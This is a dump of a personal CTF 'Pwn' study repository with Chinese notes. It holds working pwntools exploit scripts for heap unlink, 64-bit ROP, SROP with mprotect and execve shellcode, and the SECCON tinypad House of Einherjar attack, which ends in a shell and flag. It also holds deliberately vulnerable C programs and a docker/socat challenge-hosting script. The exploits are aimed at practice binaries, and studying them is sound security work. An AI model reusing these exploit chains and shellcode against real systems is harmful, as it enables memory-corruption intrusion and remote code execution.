new_sh('A'*first_size) 46 | new_sh('B'*second_size) 47 | new_sh('/bin/sh;') 48 | # 构造第一个区的信息 49 | PREV_IN_USE = 0x1 50 | prev_size_0 = p64(0) 51 | size_0 = p64(first_size | PREV_IN_USE) 52 | print "size_0:", size_0 53 | fd_0 = p64(0x6016d0 - 0x18) 54 | bk_0 = p64(0x6016d0 - 0x10) # 0x6016c0可以从bss段找到 加上flag 和 length的偏移就是第一个name_ptr了 55 | data_0 = 'p'*(first_size-0x20) # 去掉header 这里是构造chunk0为free chunk 所以算上fd和bk 56 | prev_size_1 = p64(first_size) 57 | size_1 = p64(second_size + 0x10) # 0x10为header大小 因为不是free chunk 所以没有fd和bk 58 | payload1 = prev_size_0 + size_0 + fd_0 + bk_0 + data_0 59 | payload1 += prev_size_1 + size_1 60 | # test1 61 | ptr_addr = 0x6016d0 62 | payload = p64(0) + p64(0xa1) + p64(ptr_addr-0x18) + p64(ptr_addr-0x10) + 'a'*0x80 + p64(0xa0) + p64(0xb0) 63 | edit_sh(0, payload1) # 覆盖chunk 64 | # 触发unlink 65 | del_sh(1); 66 | # *0x6016d0 = 0x6016d0 - 0x18 即shell_0的name_ptr已经变成了shell_0的首地址 67 | rubbish = p64(0x0) # 这里从程序看 0x6010b8 是无关紧要的 68 | is_shellcode_exist = p64(0x1) # flag 69 | shellcode_size = p64(0xa) # 要打印的长度 10*%02x 70 | libc_free_got = p64(0x0000000000601600) # got表中free的地址 71 | payload2 = rubbish + is_shellcode_exist + shellcode_size + libc_free_got 72 | # leak 73 | free_got = 0x0000000000601600 74 | payload = p64(0x0) + p64(0x1) + p64(0xa) + p64(free_got) 75 | edit_sh(0, payload2) 76 | free_address = list_sh() 77 | print "free_address:", hex(free_address) 78 | # 计算system地址 79 | lib_sys_addr = 0x0000000000046590 80 | lib_free_addr = 0x0000000000082d00 81 | #lib_sys_addr = 0x46640 82 | #lib_free_addr = 0x82df0 83 | system_addr = free_address - lib_free_addr + lib_sys_addr 84 | print "system_addr:", hex(system_addr) 85 | # 修改got表中free地址为system 86 | edit_sh(0, p64(system_addr)) 87 | # 触发free(实际上已经修改成了system) 88 | del_sh(2) 89 | p.interactive() 90 | 91 | main() 92 | 93 | -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/shellman: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/shellman -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/shellman.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/shellman.i64 -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/unlink.md: -------------------------------------------------------------------------------- 1 | ## struct bins 2 | 3 | ```C 4 | struct malloc_chunk { 5 | INTERNAL_SIZE_T prev_size; 6 | INTERNAL_SIZE_T size; 7 | struct malloc_chunk * fd; 8 | struct malloc_chunk * bk; 9 | }; 10 | ``` 11 | 12 | ## unlink 13 | 14 | ```C 15 | /* Take a chunk off a bin list */ 16 | #define unlink(P, BK, FD) { \ 17 | FD = P->fd; \ 18 | BK = P->bk; \ 19 | if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ 20 | malloc_printerr (check_action, "corrupted double-linked list", P); \ 21 | else { \ 22 | FD->bk = BK; \ 23 | BK->fd = FD; \ 24 | if (!in_smallbin_range (P->size) \ 25 | && __builtin_expect (P->fd_nextsize != NULL, 0)) { \ 26 | assert (P->fd_nextsize->bk_nextsize == P); \ 27 | assert (P->bk_nextsize->fd_nextsize == P); \ 28 | if (FD->fd_nextsize == NULL) 29 | { 30 | if (P->fd_nextsize == P) \ 31 | FD->fd_nextsize = FD->bk_nextsize = FD; \ 32 | else { \ 33 | FD->fd_nextsize = P->fd_nextsize; \ 34 | FD->bk_nextsize = P->bk_nextsize; \ 35 | P->fd_nextsize->bk_nextsize = FD; \ 36 | P->bk_nextsize->fd_nextsize = FD; \ 37 | } \ 38 | } else { \ 39 | P->fd_nextsize->bk_nextsize = P->bk_nextsize; \ 40 | P->bk_nextsize->fd_nextsize = P->fd_nextsize; \ 41 | } \ 42 | } \ 43 | } \ 44 | } 45 | ``` 46 | 47 | ## result 48 | 49 | 64bit 50 | ```C 51 | FD 
= fake_fd = target_addr - 0x18 52 | BK = fake_bk = target_addr - 0x10 53 | //then 54 | FD + 0x18 = BK = target_addr - 0x10 55 | BK + 0x10 = FD = target_addr - 0x18 56 | // thus 57 | *target_addr = target_addr - 0x18 58 | ``` 59 | 60 | 32bit 61 | ```C 62 | FD = fake_fd = target_addr - 0x0c 63 | BK = fake_bk = target_addr - 0x08 64 | //then 65 | FD + 0x18 = BK = target_addr - 0x08 66 | BK + 0x10 = FD = target_addr - 0x0c 67 | // thus 68 | *target_addr = target_addr - 0x0c 69 | ``` 70 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/exp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/exp4 -------------------------------------------------------------------------------- /Pwn/examples/rop_64/level4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/level4 -------------------------------------------------------------------------------- /Pwn/examples/rop_64/linux_64_rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/linux_64_rop -------------------------------------------------------------------------------- /Pwn/examples/rop_64/linux_64_rop.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void callsystem() 6 | { 7 | system("/bin/sh"); 8 | } 9 | 10 | void vulnerable_function() 11 | { 12 | char buf[128]; 13 | read(STDIN_FILENO, buf, 512); 14 | } 15 | 16 | int main() 17 | { 18 | write(STDOUT_FILENO, "Hello, seigai\n", 14); 19 | vulnerable_function(); 20 | } 21 | 
-------------------------------------------------------------------------------- /Pwn/examples/rop_64/linux_64_sh.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | void systemaddr() 7 | { 8 | void* handle = dlopen("libc.so.6", RTLD_LAZY); 9 | printf("%p\n",dlsym(handle,"system")); 10 | fflush(stdout); 11 | } 12 | 13 | void vulnerable_function() 14 | { 15 | char buf[128]; 16 | read(STDIN_FILENO, buf, 512); 17 | } 18 | 19 | int main(int argc, char** argv) 20 | { 21 | systemaddr(); 22 | write(1, "Hello, World\n", 13); 23 | vulnerable_function(); 24 | } 25 | 26 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/lv4.py: -------------------------------------------------------------------------------- 1 | #!python 2 | #!/usr/bin/env python 3 | from pwn import * 4 | from zio import * 5 | 6 | libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') 7 | 8 | io = zio('./level4') 9 | #p = remote('127.0.0.1',10001) 10 | 11 | binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] 12 | #print "binsh_addr_offset = " + hex(binsh_addr_offset) 13 | 14 | pop_ret_offset = 0x0000000000022b9a - libc.symbols['system'] 15 | #print "pop_ret_offset = " + hex(pop_ret_offset) 16 | 17 | #print "\n##########receiving system addr##########\n" 18 | system_addr = 0x7f2e1d466590 19 | print "system_addr = 0x%x" %system_addr 20 | 21 | binsh_addr = system_addr + binsh_addr_offset 22 | print "binsh_addr = " + hex(binsh_addr) 23 | 24 | 25 | pop_ret_addr = system_addr + pop_ret_offset 26 | print "pop_ret_addr = " + hex(pop_ret_addr) 27 | #p.recv() 28 | 29 | 30 | 31 | payload = "A"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr) 32 | print payload 33 | 34 | #p.send(payload) 35 | 36 | #p.interactive() 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/pattern.py: 
-------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from pwn import * 3 | #elf = ELF('linux_64_rop') 4 | #pro = process('./linux_64_rop') 5 | #pro = remote('127.0.0.1', 10000) 6 | padding = "" 7 | for i in range(136): 8 | padding += 'A' 9 | #0x7ff145e76590 10 | #0x00000000004005bd 11 | sys_addr = "\xbd\x05\x40\x00\x00\x00\x00\x00" 12 | 13 | payload = padding + sys_addr 14 | print payload 15 | #pro.send(payload) 16 | #pro.interactive() 17 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/payload -------------------------------------------------------------------------------- /Pwn/examples/rop_chain/README.md: -------------------------------------------------------------------------------- 1 | ## rop 2 | 主要是64bit的 3 | 4 | ## func 5 | 6 | 64bit构造rop,利用libc_cus_init处相关rop。 7 | 8 | ropper查找较全面 9 | 10 | 11 | ```Python 12 | def prod_rop3(func_addr, arg1, arg2, arg3): 13 | payload = p64(rop64_step1_addr) 14 | payload += p64(0) 15 | payload += p64(0) # rbx 16 | payload += p64(1) # rbp 17 | payload += p64(func_addr) # r12 18 | payload += p64(arg1) # r13 19 | payload += p64(arg2) # r14 20 | payload += p64(arg3) # r15 21 | payload += p64(rop64_step2_addr) # ret to step2 22 | payload += 'r'*rop_pad_size # padding 23 | payload += p64(main_vuln_addr) # return to main vuln 24 | return payload 25 | 26 | ``` 27 | 28 | -------------------------------------------------------------------------------- /Pwn/examples/rop_chain/rop_test64.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.kernel = "amd64" 5 | LOCAL = True 6 | 7 | def mt_send(io, data): 8 | io.send(dtat) 9 | time.sleep(0.1) 10 | 11 
| # main vuln address define 12 | main_vuln_addr = 0x400544 13 | rop64_step1_addr = 0x4005E6 14 | rop64_step2_addr = 0x4005D0 15 | rop_pad_size = 0x38 16 | 17 | # start pwn 18 | elf = ELF("./unexploitable") 19 | if LOCAL: 20 | context.log_level = 'debug' 21 | io = process("./unexploitable") 22 | else: 23 | io = remote("pwnable.kr", 22333) 24 | 25 | def prod_rop3(func_addr, arg1, arg2, arg3): 26 | payload = p64(rop64_step1_addr) 27 | payload += p64(0) 28 | payload += p64(0) # rbx 29 | payload += p64(1) # rbp 30 | payload += p64(func_addr) # r12 31 | payload += p64(arg1) # r13 32 | payload += p64(arg2) # r14 33 | payload += p64(arg3) # r15 34 | payload += p64(rop64_step2_addr) # ret to step2 35 | payload += 'r'*rop_pad_size # padding 36 | payload += p64(main_vuln_addr) # return to main vuln 37 | return payload 38 | 39 | def un_exp(): 40 | time.sleep(3) 41 | payload = 'p'*0x18 42 | payload += prod_rop3(elf.got['read'], 0, 0x601030, 0x08) 43 | io.send(payload) 44 | time.sleep(0.4) 45 | io.send('ffffffff') 46 | 47 | if __name__ == '__main__': 48 | raw_input("start") 49 | un_exp() 50 | raw_input("end") 51 | 52 | 53 | -------------------------------------------------------------------------------- /Pwn/examples/rop_chain/unexploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_chain/unexploitable -------------------------------------------------------------------------------- /Pwn/examples/srop/README.md: -------------------------------------------------------------------------------- 1 | # SROP 2 | 3 | SROP是一种特殊的rop。 4 | 5 | ## Vuln 6 | 程序漏洞明显,就是栈溢出,而且没有加载so库,只有短短几十字节代码。 7 | 8 | ## leak 9 | leak的话,利用write函数即可 10 | 11 | ```Python 12 | def sm_leak(): 13 | payload = p64(main_vuln_addr)*3 14 | io.send(payload) 15 | payload = p64(0x4000B3)[0] # write(1, stack, 0x400) 16 | io.send(payload) 17 | data = io.recv(0x200) 18 | 
io.clean() 19 | return data 20 | ``` 21 | 22 | 主要的技巧就是: 23 | 24 | 1. 先读取一次,这样栈上先覆盖几个main函数地址。 25 | 2. 读取第二次的时候,故意取n个字节读取,从而控制rax的值。(根据read返回值是读取到的字节数) 26 | 3. 注意第二次读取的时候,ret的地址要改成syscall 27 | 28 | ## SROP 29 | 新姿势srop 30 | ### Ref 31 | [srop原理](http://www.freebuf.com/articles/network/87447.html) 32 | 33 | 34 | ```Python 35 | def sm_func(func_id, marg0, marg1, marg2, mstack, mrip): 36 | mframe = SigreturnFrame() 37 | mframe.rax = func_id 38 | mframe.rdi = marg0 39 | mframe.rsi = marg1 40 | mframe.rdx = marg2 41 | mframe.rsp = mstack 42 | mframe.rip = mrip 43 | sig_padding = p64(main_vuln_addr) 44 | sig_padding += p64(syscall_addr) 45 | payload = sig_padding + str(mframe) 46 | return payload 47 | ``` 48 | ### step1 49 | 首先要把之前leak的栈地址给填充真正的rop 50 | 51 | ```Python 52 | lk_use_addr = sm_leak()[0x10:0x18] 53 | lk_use_addr = (u64(lk_use_addr)-0x400)&0xFFFFFFFFFFFFF000 54 | log.info("rop address : " + hex(lk_use_addr)) 55 | payload = sm_func(constants.SYS_read, constants.STDIN_FILENO, lk_use_addr, 0x400, lk_use_addr, syscall_addr).ljust(0x400, chr(0)) 56 | io.send(payload) 57 | payload = payload[8:23] 58 | io.send(payload) 59 | ``` 60 | 61 | ### 调用mprotect 62 | 63 | 调用mrpotct并且rsp转移到一个地址,这个地址填充shellcode地址。
64 | 65 | 66 | ```Python 67 | # size must be 0x1000*n 68 | # mprotect(lk_use_addr, 0x1000, 7) 69 | payload = sm_func(constants.SYS_mprotect, lk_use_addr, 0x1000, 7, lk_use_addr+0x200, syscall_addr).ljust(0x200, chr(0)) 70 | payload += p64(lk_use_addr+0x208) # rop to shellcode address 71 | payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 72 | io.send(payload.ljust(0x400, chr(0))) 73 | payload = payload[8:23] 74 | io.send(payload) 75 | io.interactive() 76 | ``` 77 | 78 | ## Tips 79 | 注意,read是阻塞,所以send后面需要加延时,这样才不使得read(0, buf, 0x400)一定是接收0x400字节 80 | -------------------------------------------------------------------------------- /Pwn/examples/srop/sh_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.7 2 | # coding:utf-8 3 | from pwn import * 4 | import time 5 | 6 | elf = ELF("./smallest") 7 | LOCAL = True 8 | context.clear(arch="amd64") 9 | #context.log_level = 'debug' 10 | 11 | main_vuln_addr = 0x4000B0 12 | syscall_addr = 0x4000BE 13 | if LOCAL: 14 | io = process("./smallest") 15 | else: 16 | io = remote("127.0.0.1", 22333) 17 | #io = remote("106.75.93.227", 20000) 18 | 19 | def sm_leak(): 20 | payload = p64(main_vuln_addr)*3 21 | io.send(payload) 22 | time.sleep(1) 23 | payload = p64(0x4000B3)[0] # write(1, stack, 0x400) 24 | io.send(payload) 25 | time.sleep(1) 26 | data = io.recv(0x200) 27 | io.clean() 28 | return data 29 | 30 | def sm_func(func_id, marg0, marg1, marg2, mstack, mrip): 31 | mframe = SigreturnFrame() 32 | mframe.rax = func_id 33 | mframe.rdi = marg0 34 | mframe.rsi = marg1 35 | mframe.rdx = marg2 36 | mframe.rsp = mstack 37 | mframe.rip = mrip 38 | sig_padding = p64(main_vuln_addr) 39 | sig_padding += p64(syscall_addr) 40 | payload = sig_padding + str(mframe) 41 | return payload 42 | 43 | lk_use_addr = sm_leak()[0x10:0x18] 44 | lk_use_addr = (u64(lk_use_addr)-0x400)&0xFFFFFFFFFFFFF000 45 | log.info("rop address : " 
+ hex(lk_use_addr)) 46 | payload = sm_func(constants.SYS_read, constants.STDIN_FILENO, lk_use_addr, 0x400, lk_use_addr, syscall_addr).ljust(0x400, chr(0)) 47 | io.send(payload) 48 | time.sleep(1) 49 | payload = payload[8:23] 50 | io.send(payload) 51 | time.sleep(1) 52 | raw_input("what stack") 53 | 54 | # size must be 0x1000*n 55 | # mprotect(lk_use_addr, 0x1000, 7) 56 | payload = sm_func(constants.SYS_mprotect, lk_use_addr, 0x1000, 7, lk_use_addr+0x200, syscall_addr).ljust(0x200, chr(0)) 57 | payload += p64(lk_use_addr+0x208) # rop to shellcode address 58 | payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 59 | io.send(payload.ljust(0x400, chr(0))) 60 | time.sleep(1) 61 | payload = payload[8:23] 62 | io.send(payload) 63 | time.sleep(1) 64 | io.interactive() 65 | raw_input("end") 66 | 67 | 68 | 69 | -------------------------------------------------------------------------------- /Pwn/examples/srop/smallest: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/srop/smallest -------------------------------------------------------------------------------- /Pwn/examples/template.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time, sys 3 | 4 | 5 | # local process envirnoment 6 | LOCAL = False 7 | elf_name = "./pwn" 8 | 9 | #retmote args 10 | remote_host = "127.0.0.1" 11 | remote_port = 50002 12 | context.clear(arch="amd64") 13 | elf = ELF(elf_name) 14 | 15 | if LOCAL: 16 | smlbin_area_off = 0x3C3B78 17 | execv_binsh_off = 0xF0567 18 | malloc_hook_off = 0x3C3B10 19 | context.log_level = "debug" 20 | mine_env = os.environ 21 | mine_env['LD_PRELOAD'] = "/home/deadfish/Pwn/Tools/preeny/x86_64-linux-gnu/dealarm.so" 22 | io = process(elf_name, env=mine_env) 23 | else: 24 | #context.log_level = 
"debug" 25 | smlbin_area_off = 0x3C3B78 26 | execv_binsh_off = 0xF0567 27 | malloc_hook_off = 0x3C3B10 28 | io = remote(remote_host, remote_port) 29 | 30 | def dlySend(sdstr): 31 | io.send(sdstr) 32 | time.sleep(0.01) 33 | 34 | def mmenu(mindex): 35 | io.recvuntil("\n") 36 | io.sendline(str(mindex)) 37 | 38 | def s_exp(): 39 | print io.recvall() 40 | 41 | if __name__ == "__main__": 42 | s_exp() 43 | #pause() 44 | 45 | '''' 46 | PwnPineappleApplePwn 47 | https://www.youtube.com/watch?v=0E00Zuayv9Q 48 | '''' 49 | 50 | from pwn import * 51 | context.arch = 'amd64' 52 | #context.log_level = 'debug' 53 | 54 | p = process('./tinypad') 55 | #p = remote('tinypad.pwn.seccon.jp', 57463) 56 | p.recvuntil('>>> ') 57 | 58 | 59 | def debug(address): 60 | gdb.attach(p, 'b *0x%x' % address) 61 | raw_input() 62 | 63 | 64 | def add_memo(size,content): 65 | p.sendline('A') 66 | p.recvuntil('>>> ') 67 | p.sendline(str(size)) 68 | p.recvuntil('>>> ') 69 | p.sendline(content) 70 | p.recvuntil('>>> ') 71 | 72 | def delete_memo(idx): 73 | p.sendline('D') 74 | p.recvuntil('>>> ') 75 | p.sendline(str(idx)) 76 | p.recvuntil('>>> ') 77 | 78 | def edit_memo(idx, content): 79 | p.sendline('E') 80 | p.recvuntil('>>> ') 81 | p.sendline(str(idx)) 82 | p.recvuntil('>>> ') 83 | p.sendline(content) 84 | p.recvuntil('>>> ') 85 | p.sendline('Y') 86 | p.recvuntil('>>> ') 87 | 88 | unsorted_bin_offset = 0x7fa55f51c7b8 - 0x7fa55f15e000 89 | 90 | prev_size = 0x100 91 | chunk_size = 0x40 92 | 93 | # Vuln1: When deleting memo, there isn't address nullify (just size filed = 0)& When showing memo, there isn't checking size field. => Memory leak 94 | # Vuln2: Can modify next chunk's prev_size & size's Last byte to Null. 
# (We must set next chunk's size > 0x100) => Heap Exploit


# Using Vuln1
# Four 256-byte memos (0x110 chunks, too big for fastbins); freeing memo 3,
# which is not adjacent to the top chunk, parks it in the unsorted bin so its
# fd/bk point into main_arena (libc).
add_memo(256, 'A'* 8) # Chunk 1 & Memo1
add_memo(256, 'B'* 8) # Chunk 2 & Memo2
add_memo(256, 'B'* 8) # Chunk 3 & Memo3
add_memo(256, 'B'* 8) # Chunk 4 & Memo4
delete_memo(3) # free(Chunk3): Chunk3 goes to the unsorted bin & Chunk3->fd = unsorted-bin head
# An empty command presumably redraws the memo list; the stale pointer (Vuln1)
# makes it print the freed chunk's contents, i.e. its fd pointer.
p.sendline('')
p.recvuntil('INDEX: 3')
p.recvuntil('CONTENT: ')
leak = p.recv(8192)

# First 6 bytes, little-endian = the unsorted-bin pointer (only the low 6
# bytes of a user-space pointer are non-zero).
unsorted_bin = int(leak[:6][::-1].encode('hex'), 16)

libc_base = unsorted_bin - unsorted_bin_offset
print '[+] unsorted_bin : 0x%x' % unsorted_bin
print '[+] libc base: 0x%x' % libc_base

# Same trick on memo 1: once freed its fd points at the other unsorted chunk
# (presumably chunk 3), a heap address.  The heap of this non-PIE binary lies
# just above the 0x602000 data segment, so the address is 3 or 4 bytes wide;
# if the 4th byte received is already the trailing newline, only 3 were printed.
delete_memo(1)
p.sendline('')
p.recvuntil('INDEX: 1')
p.recvuntil('CONTENT: ')
leak = p.recv(4)
if leak[3] == '\x0a':
    heap_base = u32(leak[0:3]+'\x00')
else:
    heap_base = u32(leak)
heap_base -= 0x220  # observed distance from the leaked pointer to the heap start -- TODO confirm per target

print '[+] heap base: 0x%x' % heap_base

delete_memo(2)
delete_memo(4)



# Using Vuln2
# Unsafe Unlink (https://github.com/shellphish/how2heap/blob/master/unsafe_unlink.c)
add_memo(248, 'A'* 247) # Chunk 1 & Memo1
add_memo(248, 'B'* 247) # Chunk 2 & Memo2
delete_memo(1)

prev_size = 256 - 8*2
# Pop Chunk1 & Memo1 & Chunk2.size = 0x110-> 0x100 (by null terminate bug) & P->FD->BK == P && P->BK->FD == P
# The fake chunk's fd/bk are chosen so that both unlink safety checks resolve
# through pointers stored in the tinypad global at 0x602040 (see the memory
# dump below); the trailing prev_size makes chunk 2 believe the fake chunk is
# the free chunk right before it.
add_memo(248, p64(0) + p64(0) +p64(0x602040 + 0x100 + 8 - 8*3) + p64(0x602040 + 0x100 + 8 - 8*2) + 'A' * 208 + p64(prev_size))
add_memo(256, 'D'* 255) # Chunk3 & Memo3
delete_memo(2) # Consolidate with Chunk1 P->FD->BK = P->BK , P->BK->FD = P->FD

'''
0x602120 : 0x0000000000000000
0x602128 : 0x0000000000000000
0x602130 : 0x0000000000000000
0x602138 : 0x0000000000000000
0x602140 : 0x00000000000000f8
0x602148 : 0x0000000000602130 : P->FD->BK = P->BK
'''


# Make fake chunk on tinypad+224
# The fake chunk at 0x602120 (= 0x602040 + 224) gets a size that reaches
# exactly up to the top chunk with PREV_INUSE set; freeing it (memo 1's
# pointer is now 0x602130, per the dump above) merges that .bss range into
# the top chunk.  This looks like the House of Einherjar step the flag text
# below alludes to.
prev_size = 0x40
size = heap_base + 0x310 - 0x602120 + 0x1 # heap_base + 0x310 = Top chunk
edit_memo(3, 'A'* (256 - 32) + p64(prev_size) + p64(size) + 'A' * 15)
delete_memo(1) # free(0x602130) Consolidate with Top chunk

# Consume all last remainder
# Drain the leftover free space so that the next 256-byte request is served
# from the relocated top chunk at 0x602130.
add_memo(112, 'D' * 112)
delete_memo(1)
add_memo(96, 'D' * 96)
delete_memo(1)
add_memo(80, 'D' * 80)
delete_memo(1)
add_memo(64, 'D' * 64)
delete_memo(1)
add_memo(48, 'D' * 48)
delete_memo(1)


# libc-specific: offset of the `environ` symbol and of a one-gadget in the
# target libc.  Both must be recomputed for another libc build.
environ_offset = 0x5e9178
oneshot_gadget_offset = 0xe66bd
pad_size = 'A' * 8
pad1_address = libc_base + environ_offset
pad2_address = 0x602140 + 8 * 4

# Malloc from top chunk (0x602130)
# This write lands on the memo table: 16 bytes of padding, then one
# (size, pointer) pair per memo starting at 0x602140.  Memo 1 and memo 3 now
# point at libc's environ, memo 2 points at memo 3's own table entry
# (0x602160 = pad2_address), memo 4 is NULL.
add_memo(256 , 'A' * 16+ pad_size + p64(pad1_address) + pad_size + p64(pad2_address) + pad_size + p64(pad1_address) + pad_size + p64(0))

# Listing the memos now prints *environ, i.e. a stack address.
p.sendline('')
p.recvuntil('INDEX: 1')
p.recvuntil('CONTENT: ')
envp = u64(p.recv(6)+'\x00\x00')
print '[+] envp = 0x%x' % envp

# Editing memo 2 rewrites memo 3's pointer to the saved return address
# (envp - 0xf0, an offset found while debugging -- TODO confirm per target);
# editing memo 3 then writes the one-gadget there.  Quitting the menu ('Q' in
# the transcript below) returns into it.
edit_memo(2, pad_size + p64(envp - 0xf0)) # pad3_address = return address
edit_memo(3, p64(libc_base + oneshot_gadget_offset)) # return address = oneshot_gadget
p.interactive()

'''
(CMD)>>> $ Q
$ id
uid=10545 gid=1001(tinypad) groups=1001(tinypad)
$ ls
flag.txt
run.sh
tinypad-0e6d01f582e5d8f00283f02d2281cc2c661eba72
$ cat flag.txt
Congratz! Yo got the flag!
SECCON{5m45h1n9_7h3_574ck_f0r_fun_4nd_p40f17_w1th_H0u53_0f_31nh3rj4r}
$
'''
-------------------------------------------------------------------------------- /Pwn/pwn_pwn.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/pwn_pwn.jpg -------------------------------------------------------------------------------- /Pwn/socat_pwn.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Deploy one pwn challenge binary behind socat inside a docker container:
#     socat_pwn.sh <elf_file> <port>
# Expects flag.txt and the ELF in the current directory; copies both into
# /home/pwn of a fresh "ubuntu:pwn" container and serves the ELF on <port>.

echo "Start script $0"
echo "check flag file"
directory="."
flag_file="flag.txt"
if [ -f $flag_file ]
then
    # NOTE(review): this prints the flag to stdout, so it ends up in the
    # deployer's terminal scrollback / CI logs.  The -f check above is enough;
    # the flag value never needs to be echoed.
    echo "flag is `cat $flag_file`"
    # NOTE(review): chmod 755 on *every* file in the directory (flag included)
    # is broader than needed.  docker cp preserves mode bits, so the flag ends
    # up readable by every uid in the container and needlessly executable.
    # Only the ELF needs +x; the flag should be 0644 at most (0640 owned by the
    # service user's group if the container has other users).
    chmod 755 $directory/*
else
    echo "flag file flag.txt does not exists"
    exit 1
fi

docker_img="ubuntu:pwn"
docker_dir="/home/pwn"
echo "args is $#"
# NOTE(review): `==` inside [ ] is a bashism; `-eq` is the portable test.
if [ $# == 2 ]
then
    elf_file=$1
    socat_port=$2
    # NOTE(review): $1/$2 are unquoted everywhere below, so a path containing
    # whitespace or glob characters breaks the commands, and --name rejects a
    # value containing '/'.  `-p $2:$2` publishes the port on all host
    # interfaces (docker's default 0.0.0.0); use `-p 127.0.0.1:$2:$2` when a
    # proxy or firewall is meant to front the service.  No --memory /
    # --pids-limit is set on the container (see the socat note below).
    container_id=`docker run -it -d -p $2:$2 --name $elf_file $docker_img`
    docker cp $directory/$flag_file $container_id:$docker_dir
    docker cp $directory/$elf_file $container_id:$docker_dir
    # NOTE(review): `fork` spawns one child per connection with no
    # per-connection timeout and no resource limit, so a handful of idle or
    # hostile clients can exhaust the container's pids/memory.  Usual
    # hardening: `socat -T60 ...`, a `--pids-limit` on the container, and a
    # `timeout` around the binary (system:"timeout 60 $docker_dir/$elf_file").
    # The trailing & also means a socat start-up failure goes unnoticed here.
    docker exec -u pwn $container_id socat tcp-listen:$socat_port,reuseaddr,fork system:$docker_dir/$elf_file &
else
    echo "format: $0 [elf_file] [port]"
    exit 1
fi


-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | $$$$$$$$$ $$$ 2 | $$$ $$$$ 3 | $$$ $$$ $$$ $$$$ $$$$$ $$$d $$$ $$$ 4 | $$$ $$$ $$$ $ $$$$$$$ f$$$ $$$ $$$$$$d $$$ $$$ 5 | $$$$$$$$$$ $$$ $$$ $$ $$$$ $$$ $$$ $$$ 6 | $$$ $$$ $$$ $$$ $$$ f$$$$$$$$ $$ $$ $$$ 7 | $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$ $$ $$ 8 | $$$ $$$$ $$$ $$$ $$$ $$$f $$$ $$ $$$$$$ 9 | $$$$$$$$$$ $$$ $$$ $$$ $$$$$$$$$ $$ $$$$ 10 | $$ $$$ 11 | $$$ 12 | $$$$ 13 | $ 14 | 15 | > 
随手写的笔记,算是学习过程的一点记录,忘记的时候也可以方便查 16 | 17 | ## 1.Reverse 18 | Some writeups of CTF and exercises 19 | ### Books 20 | 1. [RE4B-ch](https://github.com/dennis714/reverse-engineering-for-beginners)
21 | 2. [RE4B-en](https://beginners.re/RE4B-EN.pdf)
22 | 3. [IDA Pro 权威指南](http://www.ituring.com.cn/book/791) 推荐 IDA真的很强大 OD感觉可能有点过时
23 | 4. [逆向工程核心原理](http://www.ituring.com.cn/book/1266)
24 | 5. [加密与解密](http://bbs.pediy.com/showthread.php?t=66210)
25 | 6. [C++反汇编与逆向分析技术揭秘](http://bbs.pediy.com/showthread.php?t=140350)
26 | 27 | ### Sites 28 | 1. [看雪](http://www.pediy.com/)
29 | 2. [52破解](http://www.52pojie.cn/)
30 | 3. [i春秋](http://www.ichunqiu.com/)
31 | 32 | 33 | ## 2.Pwn 34 | Some tips about Pwn 35 | ### Sites 36 | 1. [resource recommand](http://www.pentest.guru/index.php/2016/01/28/best-books-tutorials-and-courses-to-learn-about-exploit-development/) 推荐一些exploit学习资源 开始就是看这个的
37 | 2. [DEF CON](https://www.defcon.org/#) 资讯
38 | 3. [tisiphone](https://tisiphone.net/) 咨询
39 | 4. [exploit database](https://www.exploit-db.com/) 提供各种漏洞
40 | 5. [shellcode](http://shell-storm.org/shellcode/) 各种shellcode都有
41 | 6. [How2Heap](https://github.com/shellphish/how2heap) 主要是linux堆溢出相关,很好的入门资料
